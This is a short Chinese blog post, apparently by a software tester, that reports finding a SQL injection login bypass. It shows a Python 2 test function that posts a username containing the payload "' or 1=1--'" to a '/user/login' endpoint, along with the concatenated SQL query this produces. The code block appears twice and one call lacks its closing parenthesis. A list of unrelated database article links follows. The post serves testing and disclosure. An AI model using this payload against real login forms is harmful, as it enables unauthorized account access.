7年来第1次,发现的sql绕过登录的问题
2015-09-24 09:19
302 查看
问题描述:
def pms_user_login(test_point,username,password):
uri = host + '/user/login'
password = hashlib.md5(password).hexdigest()
url_body = urllib.urlencode({'name':username,'password':password})
s,r = htp.request(uri, method = 'POST', body = url_body)
content = json.loads(r)
print test_point, content
if content['errorCode'] != '':
print content['failureDetails']
#pms_user_login('11','f_super\' or 1=1--\'','123456')
pms_user_login('11','dfffrrrd\' or 1=1--\'','123456'
拼成的执行sql为:select * from pms_user where name='f_super' or 1=1--'' and password='e10adc3949ba59abbe56e057f20f883e'
def pms_user_login(test_point,username,password):
uri = host + '/user/login'
password = hashlib.md5(password).hexdigest()
url_body = urllib.urlencode({'name':username,'password':password})
s,r = htp.request(uri, method = 'POST', body = url_body)
content = json.loads(r)
print test_point, content
if content['errorCode'] != '':
print content['failureDetails']
#pms_user_login('11','f_super\' or 1=1--\'','123456')
pms_user_login('11','dfffrrrd\' or 1=1--\'','123456'
拼成的执行sql为:select * from pms_user where name='f_super' or 1=1--'' and password='e10adc3949ba59abbe56e057f20f883e'
相关文章推荐
- WebApi多数据库切换
- 总结sql语句
- 报错:1130-host ... is not allowed to connect to this MySql server 开放mysql远程连接 不使用localhost
- Python操作Redis之key的查看与删除
- Nagios客户端执行oracle检查脚本和远程server端不一致的问题
- 学习笔记:nodejs(二)——node+express+mongodb建站相关(express4)
- SQLSERVER和ORACLE批量处理表名和字段名大写
- oracle数据库连接无响应的解决
- mysql数据文件迁移到新的硬盘分区的方法
- 不知道数据库中表的列类型的前提下,使用JDBC正确的取出数据(转)
- mysql 查询语句优化实例
- Oracle11g 出现 account is unlocked 问题的解决
- mysql数据库user表host字段的%问题
- 提问:恢复Mysql的备份文件失败
- nodejs使用MySQL
- mysql修改表、字段、库的字符集
- MongoDB的常规备份策略
- Hibernate 使用原生 Native SQL
- 安装oracle11g并配置plsqldev客户端
- oracle trunc 函数处理日期格式,日期类型很有用的几个sql